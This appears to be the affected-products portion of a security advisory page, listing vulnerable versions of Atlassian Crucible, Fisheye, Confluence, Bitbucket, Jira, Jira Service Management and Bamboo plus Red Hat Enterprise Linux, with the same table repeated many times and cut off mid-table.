Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
Atlassian Jira Service Management Data Center and Server <11.3.7
Atlassian / Jira
|
Service Management Data Center and Server <11.3.7 | ||
|
Atlassian Bamboo Data Center <12.1.8
Atlassian / Bamboo
|
Data Center <12.1.8 | ||
|
Atlassian Jira Data Center <10.3.22
Atlassian / Jira
|
Data Center <10.3.22 | ||
|
Atlassian Jira Data Center <11.3.7
Atlassian / Jira
|
Data Center <11.3.7 | ||
|
Atlassian Bamboo Data Center <10.2.20
Atlassian / Bamboo
|
Data Center <10.2.20 |
Affected products
Known affected
14 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Atlassian Crucible <4.9.11
Atlassian / Crucible
|
<4.9.11 | ||
|
Atlassian Fisheye <4.9.11
Atlassian / Fisheye
|
<4.9.11 | ||
|
Atlassian Confluence Data Center <9.2.21
Atlassian / Confluence
|
Data Center <9.2.21 | ||
|
Atlassian Confluence Data Center <10.2.13
Atlassian / Confluence
|
Data Center <10.2.13 | ||
|
Atlassian Bitbucket Data Center <10.3.1
Atlassian / Bitbucket
|
Data Center <10.3.1 | ||
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Atlassian Bitbucket Data Center <9.4.21
Atlassian / Bitbucket
|
Data Center <9.4.21 | ||
|
Atlassian Bitbucket Data Center <10.2.4
Atlassian / Bitbucket
|
Data Center <10.2.4 | ||
|
Atlassian Jira Service Management Data Center and Server <10.3.22
Atlassian / Jira
|
Service Management Data Center and Server <10.3.22 | ||
|
